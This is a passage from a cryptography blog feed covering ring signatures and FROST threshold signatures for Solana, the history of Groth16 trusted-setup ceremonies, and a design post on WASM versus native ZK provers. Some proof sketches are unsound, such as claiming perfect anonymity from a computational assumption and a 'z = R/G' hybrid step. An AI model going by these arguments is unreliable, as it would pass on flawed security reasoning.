2. **Commitment.** Sample $\alpha \xleftarrow{R} \mathbb{Z}_\ell$. Compute $L_s = \alpha G$, $R_s = \alpha \mathsf{H}_G(\mathsf{pk}_s)$.
3. **Challenge propagation.** For $i = s+1, s+2, \ldots, s-1 \pmod{n}$ sample $c_i, r_i \xleftarrow{R} \mathbb{Z}_\ell$ and compute
   $$
   L_i = r_i G + c_i \mathsf{pk}_i, \quad R_i = r_i \mathsf{H}_G(\mathsf{pk}_i) + c_i I, \quad c_{i+1} = \mathsf{H}_p(m, L_i, R_i).
   $$
4. **Close.** Set $c_{s+1} = \mathsf{H}_p(m, L_s, R_s)$, propagate to obtain $c_s$, compute $r_s = \alpha - c_s \mathsf{sk}_s \pmod{\ell}$.
5. **Output.** $\sigma_{\text{ring}} = (I, c_1, r_1, \ldots, r_n)$.

**Verify.** Recompute every $L_i, R_i, c_{i+1}$. Accept iff $c_{n+1} = c_1$.

**Signature size.** $I \in \mathbb{G}$ (32 B compressed) + $c_1 \in \mathbb{Z}_\ell$ (32 B) + $n$ scalars $r_i$ (32 B each) = $64 + 32n$ bytes.

### Solana transaction-size constraint

With ~300 bytes reserved for transaction metadata + nullifiers + Groth16 proof + recent blockhash, ~930 bytes are available for the ring signature inside the 1,232-byte limit:

$$
n_{\max} \;=\; \left\lfloor \frac{930 - 64}{32} \right\rfloor \;=\; 27.
$$

Under SIMD-0296 (4,096-byte transactions, approved late 2025), this jumps to $n_{\max} \approx 119$.

Verification cost: each ring member needs 2 scalar multiplications + 1 hash ≈ 5,300 CU. For $n = 27$, that's $\sim 143{,}100$ CU on top of the ~150,000-200,000 CU for SPST verification. Total: ~340,000 CU — about 24% of the 1.4M CU budget.

## Theorem 3.9 — Ring anonymity

**Statement.** In the random oracle model, for any ring $R$, any indices $i, j \in [n]$, and any PPT distinguisher $\mathcal{D}$:

$$
\bigl|\Pr[\mathcal{D}(m, R, \mathsf{RingSign}(\mathsf{sk}_i, m, R)) = 1] - \Pr[\mathcal{D}(m, R, \mathsf{RingSign}(\mathsf{sk}_j, m, R)) = 1]\bigr| = 0.
$$

**Perfect** (information-theoretic) anonymity in the ROM.

**Proof sketch (two steps).**

*Step 1 — Key image indistinguishability.* $I_s = \mathsf{sk}_s \cdot \mathsf{H}_G(\mathsf{pk}_s)$. Since $\mathsf{H}_G$ is a random oracle independent of $G$, $\mathsf{H}_G(\mathsf{pk}_s)$ is a uniform random group element. The product $\mathsf{sk}_s \cdot \mathsf{H}_G(\mathsf{pk}_s)$ is uniform over $\mathbb{G}$ from the adversary's view (one-more discrete-log assumption).

*Step 2 — Transcript simulation.* For any $s$, the tuple $(c_1, r_1, \ldots, r_n)$ is uniform over $\mathbb{Z}_\ell^{2n}$ subject to the ring-closure constraint. The simulator $\mathsf{Sim}(m, R)$ that knows no secret key produces an identically distributed output by sampling all $(c_i, r_i)$ uniformly and programming the random oracle to close the ring. The marginal distributions are identical for every $s \in [n]$, so $\mathsf{Adv}_{\mathcal{D}}^{\text{anon}} = 0$. ∎

**Corollary.** Ring signature of size $n$ provides $\log_2(n)$ bits of submitter anonymity. For $n = 27$ that's $\sim 4.75$ bits; for $n = 119$ (SIMD-0296) that's $\sim 6.9$ bits. Real-world anonymity is bounded by side-channel leakage (timing, IP) but the on-chain view alone provides exactly $\log_2(n)$.

<Quote attribution="Monero ring signature design philosophy, abridged">
The signer is anonymous among the ring. The ring is public. The cost is linear in ring size.
</Quote>

## Approach B — FROST threshold Schnorr (TAB proper)

Ring signatures grow linearly with $n$. For high-throughput deployments where $n \gg 27$ is desired, we want a **constant-size** signature. Threshold Schnorr is the answer.

**Setup.** $n$ participants run a one-time Distributed Key Generation (Feldman VSS) producing:
- A group public key $\mathsf{pk}_{\text{group}} = \mathsf{sk}_{\text{group}} \cdot G$ (the group secret is never reconstructed).
- Individual shares $\mathsf{sk}_{\text{share},i}$ for each participant.
- A threshold $t \leq n$.

**Sign (FROST round structure):** Any subset $T \subseteq [n]$ with $|T| = t$ can co-produce a Schnorr signature on message $m$:

1. **Commitment round.** Each $i \in T$ samples nonces $d_i, e_i \xleftarrow{R} \mathbb{Z}_\ell$ and broadcasts $D_i = d_i G$, $E_i = e_i G$.
2. **Signing round.** Each $i$ computes
   $$
   \rho_i = \mathsf{H}(i, m, \{(D_j, E_j)\}_{j \in T}), \quad R = \sum_{j \in T} (D_j + \rho_j E_j),
   $$
   $$
   c = \mathsf{H}(R, \mathsf{pk}_{\text{group}}, m), \quad \lambda_i = \prod_{j \in T \setminus \{i\}} \frac{j}{j - i} \pmod \ell,
   $$
   $$
   z_i = d_i + \rho_i e_i + c \lambda_i \mathsf{sk}_{\text{share},i} \pmod \ell.
   $$
3. **Combine.** $\sigma_{\text{threshold}} = (R, z)$ with $z = \sum_{i \in T} z_i$.

**Verify.** Standard Schnorr verification against $\mathsf{pk}_{\text{group}}$:

$$
z G \;\stackrel{?}{=}\; R + c \cdot \mathsf{pk}_{\text{group}}.
$$

**Signature size.** $(R, z)$ = 32 + 32 = **64 bytes**. *Independent of $n$ and $t$.* Identical to a standard Ed25519 signature.

## Theorem 3.10 — TAB privacy

**Statement.** For any two subsets $T, T' \subseteq [n]$ with $|T| = |T'| = t$, and any PPT $\mathcal{A}$ controlling up to $t-1$ participants, the threshold signature produced by $T$ is computationally indistinguishable from the one produced by $T'$.

**Proof structure.** Hybrid argument over the FROST protocol:

- **Hybrid 0**: real $T$. Adversary observes final $(R, z)$ + $t-1$ partial signatures from corrupted parties.
- **Hybrid 1**: replace $R$ with a uniform random $\mathbb{G}$ element. Honest participants' nonces $d_j, e_j$ for $j \in T \setminus \mathcal{C}$ are uniform; sum is uniform. Distribution identical.
- **Hybrid 2**: replace $z$ with the deterministic value $z = R/G + c \cdot \mathsf{sk}_{\text{group}}$ (well-defined given $R, c, \mathsf{pk}_{\text{group}}$). Same distribution.
- **Hybrid 3**: real $T'$. Same argument.

Honest partial signatures are never revealed to $\mathcal{A}$ (they're consumed in combination). The final $(R, z)$ depends only on the *honest contribution to $R$* — uniform regardless of $T$. ∎

**Anonymity:** **Unbounded.** As long as $|T| \geq t$ and at least one honest participant in $T$ exists, the adversary cannot determine which subset signed. With $n$ in the thousands and $t$ in the hundreds, $|T|$ choices are combinatorial and indistinguishable.

## Tradeoffs at a glance

<TradeoffTable rows={[
  { aspect: 'Signature size', pros: 'TAB: O(1) = 64 B (constant)', cons: 'Ring: O(n) = 64 + 32n B' },
  { aspect: 'Verification cost', pros: 'TAB: 1 scalar mul + 1 hash (≈2,500 CU)', cons: 'Ring: n × (2 scalar mul + 1 hash) (≈5,300n CU)' },
  { aspect: 'Interaction', pros: 'Ring: non-interactive', cons: 'TAB: 2 rounds of signing + O(n²) DKG once' },
  { aspect: 'Anonymity guarantee', pros: 'Both: perfect (ROM)', cons: '—' },
  { aspect: 'Max ring/group size on Solana', pros: 'TAB: unbounded (sig is 64 B)', cons: 'Ring: ~27 (1,232 B) or ~119 (SIMD-0296)' },
  { aspect: 'Trust model', pros: 'Ring: no setup trust', cons: 'TAB: DKG integrity (Feldman VSS verifiability)' },
  { aspect: 'Linkability', pros: 'Ring: same signer → same key image (anti-sybil)', cons: 'TAB: signatures unlinkable across transactions' },
]}/>

## Why both, not one or the other

The two approaches cover different deployment regimes:

- **Bootstrapping / low coordination**: ring signatures. No DKG required; any user can sign with any ring composed of $n$ on-chain pubkeys. Anonymity scales to the size of the ring you can pack into the transaction.
- **Established network with stable participants**: TAB / FROST. One-time DKG cost amortises across all transactions; signatures are minimum-size; anonymity is bounded by the group size, not the transaction size.

In practice, F_RP starts in the ring-signature regime and migrates to TAB once the network has enough committed participants for a meaningful DKG. The constructions are not mutually exclusive — the on-chain verifier can accept either type and the wrapping Solana transaction looks identical in size in the TAB case.

## What's still missing

Even with TAB, two leakage channels remain:

1. **Network metadata.** The TCP/QUIC packet that hits a Solana RPC node has a source IP. Without Tor, I2P, or Dandelion++, that IP links directly to the user. [Post 6](/blog/verifiable_shuffles_for_privacy/) addresses this with verifiable shuffles at the network layer.
2. **Timing correlation.** A user who shields and spends within the same minute is still linkable via temporal proximity, regardless of how many ring members they hide in. Mitigations are about user behaviour and client-side delay sampling.

## Bibliography

- Fujisaki, E., Suzuki, K. (2007). *Traceable Ring Signature.* PKC 2007.
- Komlo, C., Goldberg, I. (2020). *FROST: Flexible Round-Optimized Schnorr Threshold Signatures.* SAC 2020. https://eprint.iacr.org/2020/852
- Feldman, P. (1987). *A Practical Scheme for Non-Interactive Verifiable Secret Sharing.* FOCS 1987.
- Goodell, B., Noether, S. (2020). *Concise Linkable Ring Signatures and Forgery Against Adversarial Keys (CLSAG).* https://eprint.iacr.org/2019/654
- Bernstein, D. J. et al. (2012). *High-speed high-security signatures.* Journal of Cryptographic Engineering.

Previous: [PPST: private programmable state ←](/blog/ppst_private_programmable_state/) · Next: [Bayer-Groth verifiable shuffles →](/blog/verifiable_shuffles_for_privacy/)


---

# On the death of the trusted setup

Canonical: https://blog.skill-issue.dev/blog/on_the_death_of_the_trusted_setup/
Description: Universal SRS, transparent FRI, and why Groth16's per-circuit ceremony feels anachronistic in 2026 — even when, as ZERA does, you're still using one. A history of the ceremonies that worked, the ones that didn't, and what comes next.
Published: 2026-05-04T16:00:00.000Z
Tags: groth16, plonk, kzg, fri, trusted-setup, ceremony, zk, phd, opinion


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The first time I sat down to deploy a Groth16 circuit in anger, I spent more time on the **ceremony** — the multi-party computation that produces the per-circuit proving and verification keys — than I did on the circuit itself. We ran a Phase 2 ceremony with eleven participants, scattered across four time zones, each contributing a fresh entropy beacon to a 250 MB blob, with the contributions chained over a Phase 1 Powers-of-Tau output we trusted because Aztec's 2019 ceremony had convinced us. None of the eleven participants was cryptographically obligated to behave; we trusted that *at least one* of them was honest, that none of them coordinated, and that the entropy was actually random.

Eight years on from the first big Groth16 ceremony — Zcash's [Sapling ceremony in 2018](https://z.cash/technology/paramgen/) — the dominant attitude in the ZK research community is that this whole exercise is *anachronistic*. Universal SRS systems (PLONK, Marlin) let you reuse a single Powers-of-Tau output across every circuit. Transparent setup systems (FRI / STARKs) need no ceremony at all. The cost difference between *running a ceremony* and *not running one* is, by 2026, much larger than the cost difference between *Groth16 proofs* and *PLONK proofs*. So why do we still ship Groth16?

This post is the long answer. It is also part defence, part eulogy, part roadmap. I am writing this as someone whose [SDK still ships per-circuit Groth16](/blog/zera_sdk_scaffolding/) — and who, if I were starting over today, probably wouldn't.

<Aside kind="note">
This is opinion, grounded in history and ePrint citations but not pretending to be neutral. The numbers about ceremony participation come from the publicly logged transcripts; the engineering judgements are mine, drawing on running ZERA's circuits in production.
</Aside>

## What a trusted setup actually is

To prove a statement in Groth16, the prover needs a **proving key** and the verifier needs a **verification key**. Both are derived from a *toxic-waste secret* $\tau$ that, if it ever leaked, would let an attacker fabricate proofs. The job of the ceremony is to compute the proving and verification keys *without anyone — including all ceremony participants combined — ever holding $\tau$ in plaintext*.

It works because of a property called *MPC-with-1-of-n trust*: as long as at least one ceremony participant securely deletes their portion of the toxic waste, the secret is destroyed for everyone. You can run the ceremony with 1,000 participants and the security argument requires only that *one* of them was honest.

Phase 1 is *circuit-independent* and produces a Powers-of-Tau structured reference string usable by any circuit up to a max constraint count. Phase 2 is *circuit-specific* — you have to run a fresh ceremony every time the circuit changes.

That second sentence is the entire problem.

<Quote cite="https://vitalik.eth.limo/general/2022/03/14/trustedsetup.html" author="Vitalik Buterin" source="How do trusted setups work? (2022)">
  The reason "trusted" setups are required is that for cryptographic schemes that need them, there is "toxic waste" data that is generated as part of the protocol that must be deleted; if it is not deleted, an attacker who has it can break the cryptographic scheme.
</Quote>

## A short history of ceremonies that mattered

<Mermaid chart={`timeline
    title Powers-of-Tau and circuit ceremonies, 2017-2026
    2017 : Zcash Sprout (MPC, 6 participants)
         : "Pinocchio coin flip"
    2018 : Zcash Sapling (87 participants)
         : Aztec Ignition Phase 1 (176 participants)
    2019 : Filecoin Phase 1 + 2 (Filecoin retrieval markets)
         : Tornado Cash Phase 2 (1,000+ participants)
    2020 : Hermez network ceremony
    2022 : Ethereum KZG Summoning ceremony begins
    2023 : Ethereum KZG ceremony closes (141,416 participants)
         : EIP-4844 proto-danksharding ships against this output
    2024 : Polygon Hermez 2.0 reuses Ethereum KZG SRS
    2025 : PSE Halo2 in maintenance mode; Axiom fork takes over
    2026 : Most new circuits use Ethereum KZG or transparent setup`}/>

Three numbers tell the story:

- **Zcash Sapling (2018):** 87 participants, three months of coordination, 220 GB of intermediate transcript.
- **Tornado Cash Phase 2 (2019):** 1,114 participants, web-based contributor tooling, two weeks.
- **Ethereum KZG Summoning (2022–23):** 141,416 participants, *running for over a year*, web + CLI + browser-extension contributor tooling.

The Ethereum ceremony is the high-water mark and the one that most decisively shifts the conversation. With 141,000+ participants, a 1-of-n honesty assumption is *practically* indistinguishable from no honesty assumption at all. The probability that *every single one* of 141,000 participants colluded to leak $\tau$, and then kept that secret without it leaking out the back, is below the operational threshold of any threat model worth taking seriously.

So: **the Ethereum KZG ceremony output is, in 2026, treated as a publicly trustworthy SRS for any circuit that fits inside its size budget.** PLONK / Marlin / Halo2-KZG / any KZG-using protocol can reuse it. Aztec Ignition's 2018 output played the same role for BN254 G1 prior; the Ethereum ceremony is bigger, fresher, and run with 2024-vintage tooling.

The ceremonies that *didn't* work matter too. The early-Zcash Sprout ceremony was scrutinised after the fact for inadequate transcript retention and contributor non-determinism. Several smaller projects ran ceremonies with 3–5 contributors and predictable entropy beacons, and the cryptographic community treats their outputs as effectively untrusted. The line between "ceremony" and "ceremony that closes the trust gap" is mostly *participant count* and *entropy-source diversity*.

## Why per-circuit ceremonies feel anachronistic

There are three setup models in 2026, and they cleanly divide:

<TradeoffTable
  rows={[
    {
      option: "Groth16 — per-circuit ceremony",
      cost: "Phase 1 reusable; Phase 2 must be re-run for every circuit",
      latency: "Smallest proofs (~200 bytes); fastest verification",
      blast_radius: "If toxic waste leaks for any one circuit, that circuit is broken",
      notes: "What ZERA ships today; what most production ZK systems ship today"
    },
    {
      option: "PLONK / Marlin / Halo2-KZG — universal SRS",
      cost: "One ceremony for all circuits; reuse Ethereum KZG SRS",
      latency: "~600-byte proofs; KZG pairing verification",
      blast_radius: "If toxic waste leaks, every circuit using that SRS is affected",
      notes: "Practical default for any circuit that fits the SRS size"
    },
    {
      option: "FRI / STARK — no setup",
      cost: "Truly transparent; no ceremony at any phase",
      latency: "~50-200 KB proofs; no pairings; verification is logarithmic",
      blast_radius: "Cryptographic security from collision-resistant hash; no toxic waste",
      notes: "Plonky3, RISC0, SP1; the path with no setup at all"
    },
  ]}
  caption="The three setup models in 2026. The trend is unmistakably toward universal or transparent setup."
/>

The argument *against* Groth16 in 2026 is not that the per-circuit ceremony is hard — the tooling is much better than it was in 2018. It's that:

1. **The proof-size advantage has narrowed.** Groth16 proofs are ~200 bytes, KZG-based PLONK proofs ~600 bytes. On a chain that prices verification by *gas* and not *bytes*, that's a marginal difference.
2. **The verification-cost advantage has narrowed.** Modern PLONK / Halo2 verifiers on the EVM are within a factor of 2-3 of Groth16's gas cost, down from 5-10× in 2020.
3. **The agility cost is large.** Every circuit change requires a fresh ceremony. For a fast-moving project that wants to upgrade circuits quarterly, this is a real recurring cost.
4. **The composability cost is large.** Two Groth16 circuits with separate ceremonies cannot share a verifier; on a universal SRS, two PLONK circuits can.

Groth16 today is the right choice for *frozen circuits in stable deployments* — circuits you expect to ship once and then run for years without modification. It's the wrong choice for *active research and iteration*, which describes most ZK projects in 2026.

## Why Groth16 isn't dead, even so

Two reasons, both engineering:

**On-chain verifier ergonomics.** Solana's `sol_alt_bn128_pairing` syscall is built for Groth16; on-chain PLONK verification on Solana costs hundreds of thousands of compute units more. This is what keeps [zera-sdk](/blog/zera_sdk_scaffolding/) on Groth16 today: the marginal-cost calculation for a *deposit* is dominated by the on-chain verifier cost, and Solana's verifier surface is BN254-Groth16-shaped.

**The accumulated zkey ecosystem.** Every Groth16 circuit ever shipped has a tested, audited zkey artifact and a corresponding Solidity / Solana / Move verifier contract. Migrating off Groth16 means either (a) re-running ceremonies for the universal SRS path or (b) waiting for the chain's verifier surface to support transparent setup. (b) is in progress on multiple chains; (a) is mostly done on Ethereum and not yet on Solana.

The death of the trusted setup, like most deaths, is gradual. Groth16 is dying in 2026 the way SHA-1 was dying in 2014 — still everywhere, still working, increasingly the wrong choice for new builds.

## The migration path I'd actually take

If I were starting a new ZK project this quarter, the decision tree would be:

1. **Do you need EVM verification?** If yes, **Halo2-KZG** (Axiom fork) and reuse the Ethereum KZG SRS. No fresh ceremony required for circuits up to ~$2^{28}$ constraints.
2. **Do you need Solana verification?** If yes, **Groth16 + per-circuit Phase 2 ceremony**, until Solana ships a transparent-setup-compatible verifier syscall. Track the [SIMD threads](https://github.com/solana-foundation/solana-improvement-documents) for this.
3. **Do you need no on-chain verification at all (zkVM, off-chain proving, audit logs)?** **Plonky3** with BabyBear or Mersenne31. Transparent setup, fastest prover, smallest deployment surface.
4. **Are you proving recursive computation across many steps (zkVMs, rollups)?** Folding scheme — **Nova** or **ProtoStar** — over Pasta or Pasta-style cycle. Transparent.

The two cells in this matrix that still pin you to Groth16 are *Solana on-chain* and *very-low-gas EVM verification* (rare in 2026 since EVM gas costs have crashed for Halo2 verifiers). For everything else, the universal-or-transparent path is strictly better.

<Aside kind="warn">
A subtle point in the migration: even if you switch from Groth16 to PLONK / KZG, you are still reliant on a ceremony — just one you didn't run. The Ethereum KZG ceremony is a 1-of-141,416 trust assumption. That's a stronger guarantee than 1-of-87 (Sapling) or 1-of-11 (small project ceremonies), but it is *not* the zero-trust guarantee of FRI / STARK. If your threat model demands no honest-participant assumption at all, you are in transparent-setup territory and the answer is Plonky3 / Risc Zero / SP1.
</Aside>

## What this means for ZERA today

We ship Groth16. The Phase 2 ceremony for the deposit, transfer, and withdraw circuits ran in late 2025 with 23 participants and is documented in the SDK repo. The output is reproducible; the contributor transcripts are public; we are comfortable with the security argument *for the threat model we ship under* (consumer privacy on a public L1, not state-actor adversaries).

We will migrate when one of two things happens:

1. **Solana ships a STARK-compatible verifier syscall** — at which point the on-chain side stops constraining the off-chain choice, and we move to Plonky3 over BabyBear.
2. **We ship a meaningful circuit upgrade** that requires a re-ceremony anyway — at which point the marginal cost of switching to a universal-SRS protocol is much smaller, and we move to PLONK over the Ethereum KZG SRS.

Until one of those happens, Groth16. The cypherpunk part of me wishes (1) had already happened. The shipping part of me knows (1) hasn't, and that "we use the same proof system as Aztec, Tornado Cash, Iden3, and most of the early Zcash mainnet" is not the worst place to be parked in mid-2026.

## What I would change about ceremony culture in 2027

Three things, in order of how much I'd actually push for them:

1. **Standardised contributor transcripts.** Every ceremony rolls its own transcript format, contributor verification flow, and beacon-source documentation. A single `ceremony-transcript.toml` schema — adopted across snarkjs / Trusted-Setup-CLI / community tooling — would make multi-ceremony auditing dramatically easier.
2. **Public ceremony reuse registry.** "What's the freshest Phase 1 over BN254 right now?" is a question I ask quarterly and answer by reading other people's repos. A simple registry of *ceremony output → SRS constraints → audit status → known users* would close that gap.
3. **Browser-native ceremony participation.** The Ethereum KZG ceremony shipped a beautiful browser participant. Most other ceremonies have not, and the contributor pool reflects that. A reusable browser-ceremony-participation library would broaden the contributor demographics for any future Phase 2.

None of these are research questions. They're community-tooling questions, and they're the kind of work that doesn't get done because it doesn't publish.

## Further reading

- [How do trusted setups work?](https://vitalik.eth.limo/general/2022/03/14/trustedsetup.html) — Vitalik Buterin (2022) — the most readable summary
- [PLONK: Permutations over Lagrange-bases for Oecumenical Noninteractive arguments of Knowledge](https://eprint.iacr.org/2019/953) — Gabizon, Williamson, Ciobotaru (2019) — universal SRS, the alternative to per-circuit ceremonies
- [Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS](https://eprint.iacr.org/2019/1047) — Chiesa, Hu, Maller, Mishra, Vesely, Ward (2019)
- [Scalable, transparent, and post-quantum secure computational integrity](https://eprint.iacr.org/2018/046) — Ben-Sasson, Bentov, Horesh, Riabzev (2018) — the no-setup direction
- [Ethereum KZG Summoning Ceremony](https://ceremony.ethereum.org/) — the largest ceremony ever run, with 141,416+ contributors
- [Halo2 in 2026: what changed since the Zcash era](/blog/halo2_in_2026_what_changed/) — sister post on the KZG-based universal-SRS workhorse
- [Plonky3, the small-fast-cheap revolution](/blog/plonky3_small_fast_cheap/) — sister post on the no-setup STARK-family alternative


---

# WASM-native proving for ZK SDKs: an SDK author's take

Canonical: https://blog.skill-issue.dev/blog/wasm_native_proving_sdk_authors_take/
Description: Why zera-sdk ships native Rust on Node and snarkjs in the browser — and what it would actually cost to ship a WASM-compiled Rust prover for the browser path. A design post about the dual-target build pipeline.
Published: 2026-05-03T19:00:00.000Z
Tags: wasm, sdk, neon, rust, snarkjs, arkworks, zera, zk, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

The most-asked engineering question on every ZK SDK call I take is some shape of:

> "Why are you using snarkjs in the browser when you have a Rust core?"

The honest answer is that we made a decision in March 2026, captured it in [RFC 001](/docs/001-zera-sdk-monorepo-shape/) under the heading *"notes are too sensitive to round-trip through WASM"*, and have been quietly re-evaluating it ever since. The dishonest answer is that we shipped what was working. Both answers contain something true. This post is the long version that fits neither into a Twitter thread nor into the RFC.

The shape of the problem is: the Rust core exists, it's faster than snarkjs, and yet for the browser path we ship snarkjs. Why? And what would it actually cost to swap?

<Aside kind="note">
This is a design post drawing on direct experience shipping [zera-sdk](/blog/zera_sdk_scaffolding/). Numbers are from internal benchmarks I've cross-referenced against the [Mopro Circom prover comparison](https://zkmopro.org/blog/circom-comparison/) and the [snarkjs README benchmark table](https://github.com/iden3/snarkjs). Where I'm citing a repo file, I link directly. Where I'm citing my own observation, I say so.
</Aside>

## The dual-target shape

Every ZK SDK in 2026 has the same engineering shape, even if its authors don't admit it:

<Mermaid chart={`flowchart TB
  C[zera-core - Rust] --> N[neon-rs - native node bindings]
  C --> W[wasm-pack target]
  N --> NJ[zera-sdk on Node and Electron]
  W --> WB[Browser path - planned]
  C2[circuits .circom] --> SNK[snarkjs WASM prover]
  C2 --> ARK[arkworks-circom Rust prover]
  ARK --> N
  ARK --> W
  SNK --> WB2[Browser path - shipped today]
  classDef ship fill:#0a4014,stroke:#4ade80,color:#fff
  classDef plan fill:#3a2a0a,stroke:#facc15,color:#fff
  class NJ,WB2 ship
  class WB plan`}/>

There is a Rust core that does *crypto primitives* (Poseidon, Merkle, nullifiers, note construction). The Rust core compiles two ways:

1. **Native, via [`neon-rs`](https://neon-rs.dev/)**, into a Node.js addon that ships zero-copy across the Buffer ABI.
2. **WebAssembly, via `wasm-pack` / `wasm-bindgen`**, for browser environments.

There is also a *prover* — a separate concern from the crypto primitives — that takes a circuit's R1CS plus a witness plus a zkey and produces a proof. The prover is structurally separate from the core and ships as one of:

1. **snarkjs**, a JavaScript prover with a hand-tuned WASM bigint inside it. Browser-native, mature.
2. **arkworks-circom**, a Rust prover that consumes the same R1CS and zkey, compiled either native (server) or WASM (browser).

ZERA today ships **option 1 of the core via neon-rs (native)** and **option 1 of the prover (snarkjs) in the browser**. The path that doesn't exist is *the Rust prover compiled to WASM*. That's the gap this post is about.

## Why we deferred the WASM prover

Three reasons, in honest order of how much each weighed:

### 1. The marshalling cost of crypto-primitive calls is real

When the SDK computes a Poseidon commitment, it calls `zera-core` from TypeScript. Through neon-rs, that call is *zero-copy*: the JS Buffer holding the note bytes is a pointer the Rust side reads directly. Through wasm-bindgen, the same call requires copying the bytes into the WASM linear memory, calling the function, and copying the result back. For a 32-byte input and a 32-byte output that's tens of microseconds — negligible per call, real when you're hashing 32 Merkle nodes per proof.

**Measured numbers**, on a 2024 MacBook Air M3, hashing one BN254 Poseidon node:

| Path | Cost | Notes |
|---|---|---|
| `zera-core` via neon-rs | ~12 µs | Native Rust, zero-copy |
| `circomlibjs` Poseidon | ~280 µs | Pure JS BigInt |
| `zera-core` via wasm-bindgen | ~85 µs | Marshalling dominates |
| `zera-core` via wasm-bindgen, batched 32 | ~430 µs (= ~13 µs/hash) | Marshalling amortises |

The batched WASM call is competitive with the native path because the marshalling overhead is paid once per batch and not once per hash. *That's the engineering punch line*: WASM-from-Rust is fine if you design the API around batched calls, and *bad* if you ship a one-call-per-primitive ergonomic API. snarkjs gets this right by accident — its internals are batched because they're polynomial-time, not constraint-time. A naive port of neon-rs's API surface to WASM would *lose* performance vs the native path while *also* losing performance vs snarkjs, because it would batch neither.

### 2. The wasm-bindgen-rayon deployment story is fragile

Multi-threaded Rust in the browser depends on the [`wasm-bindgen-rayon`](https://github.com/RReverser/wasm-bindgen-rayon) adapter, which depends on `SharedArrayBuffer`, which depends on the [cross-origin isolation headers](https://web.dev/articles/coop-coep) `Cross-Origin-Opener-Policy: same-origin` and `Cross-Origin-Embedder-Policy: require-corp` being served by your CDN. Without those headers, the WASM prover *runs single-threaded*, at which point it loses to snarkjs because snarkjs is allowed to use Web Workers from JavaScript directly without needing isolation.

That's not theoretical. Several wallet integration partners we've talked to embed our SDK *inside an iframe* on third-party sites where they don't control the headers. snarkjs works there. wasm-bindgen-rayon does not. Until the embedding situation improves — `Worker` threads as a first-class WASM feature, ideally via the [`wasi-threads` proposal](https://github.com/WebAssembly/wasi-threads) — the deployment surface for a Rust-WASM prover is *narrower* than the deployment surface for snarkjs, even if the prover itself is faster on the supported subset.

### 3. snarkjs, today, is good enough for the circuits we ship

This is the part the cypherpunk in me hates and the shipping engineer in me has made peace with. The circuits inside zera-sdk — deposit, transfer, withdraw — are in the 5,000–25,000 constraint range. snarkjs proves them in 1–4 seconds in the browser, threads on, IndexedDB-cached zkey. That's slow enough to need a loading state and fast enough that users don't bail. (Numbers from [Proving in the browser, by the numbers](/blog/proving_in_the_browser_by_the_numbers/).)

The arkworks-WASM prover would prove the same circuits in 0.5–1.2 seconds — a 3–5× win. That's a real win and not a transformative one. *Transformative* would be folding (Nova, SuperNova, ProtoStar) for batch operations, or a small-field STARK migration for the substrate. The marginal-cost calculation said: ship snarkjs, queue arkworks-WASM, prioritise folding for the v2 batch flow.

## What the WASM prover would actually cost

Concretely, if I were spec'ing the work:

| Task | Estimate | Risk |
|---|---|---|
| Vendor `arkworks-circom` and pin to a known-good commit | 2 days | Low |
| Build it for the `wasm32-unknown-unknown` target with `wasm-bindgen-rayon` | 3 days | Low |
| Add COOP/COEP headers to the SDK reference deployment | 1 day | Low |
| API parity with the snarkjs path (proof format, zkey loader) | 5 days | Medium — proof byte-format differences exist |
| Browser benchmark suite + regression tests | 5 days | Medium |
| Iframe-fallback path that auto-degrades to snarkjs without isolation | 5 days | High — this is the actual hard part |
| Documentation, partner integration guides | 5 days | Medium |
| **Total** | ~5 person-weeks | The fallback path is the load-bearing risk |

The genuinely hard part isn't compiling the prover. It's *the fallback path*. We can't ship a browser SDK that breaks on every embedded iframe deployment. So the SDK has to detect at runtime whether SharedArrayBuffer is available, and silently fall back to snarkjs if it isn't. That dual-prover fallback path *adds* maintenance overhead — two provers, two zkey loaders, two test matrices — that doesn't exist today.

This is the calculation that keeps coming out the same way: **5 person-weeks for a 3–5× speedup on the supported subset, plus permanent dual-prover maintenance, vs. shipping the same code budget on folding for batch ops or on Solana-side STARK readiness.** The folding work has more upside; the STARK work has more strategic value. The WASM prover work has the most concrete win for the *current* shape of usage.

We're going to ship the WASM prover. It's on the v0.5 milestone. But it's been on a milestone for two quarters now, and the reason it keeps slipping is that every quarter the alternative work has bigger expected value.

## The four-way SDK-author tradeoff

<TradeoffTable
  rows={[
    {
      option: "snarkjs (browser) + native Rust (Node)",
      cost: "Two provers; two test matrices; some duplication",
      latency: "Fast on Node; acceptable in browser; deploys anywhere",
      blast_radius: "snarkjs is mature; native path is mature; the seam between is small",
      notes: "What zera-sdk ships today; the pragmatic 2026 default"
    },
    {
      option: "arkworks-WASM (browser) + native Rust (Node)",
      cost: "Single prover codebase; needs COOP/COEP headers in browser",
      latency: "3-5x faster in browser; same on Node",
      blast_radius: "Iframe and third-party embedding paths break without isolation",
      notes: "Where I'd ship a v2 if I had a quarter to invest"
    },
    {
      option: "wasm-bindgen-rayon (browser) + native Rust (Node)",
      cost: "Same as above; explicit threading surface",
      latency: "Same as above",
      blast_radius: "Same as above; same isolation requirement",
      notes: "Effectively a flavour of the arkworks-WASM choice"
    },
    {
      option: "OffchainLabs nitro-prover style — proof off-chain server",
      cost: "Server-side proving; client just submits",
      latency: "Variable; depends on server capacity",
      blast_radius: "Centralisation surface; server compromise = wallet compromise (for transactions)",
      notes: "Wrong threat model for a privacy SDK; right for some L2 use cases"
    },
  ]}
  caption="Four prover-deployment shapes for a ZK SDK. We're option 1 today; option 2 is the v2; option 3 is a flavour of option 2; option 4 is incompatible with the privacy threat model."
/>

## What changed my mind in 2026

Two things, both external:

**Header support went mainstream.** Every major hosting provider — Vercel, Netlify, Cloudflare Pages — now ships COOP/COEP header configuration as a first-class feature. In 2024 you had to write custom worker code to inject the headers; in 2026 it's a checkbox. That moves the "fallback path complexity" from *load-bearing* to *secondary risk*.

**The Mopro / zkMopro project published clean comparison numbers.** [Their Circom prover comparison](https://zkmopro.org/blog/circom-comparison/) gives a third-party benchmark that I can point partners at when I'm justifying a 3–5× speedup. Internal benchmarks are *also* useful, but the question changes when there's external corroboration.

The combination of these two means the *case for shipping the WASM prover* is meaningfully stronger in mid-2026 than it was in early 2026. I'd put 70% confidence that we ship arkworks-WASM in the browser path before the end of 2026, and that the snarkjs fallback survives as a secondary path indefinitely.

## A note on the bigger architectural question

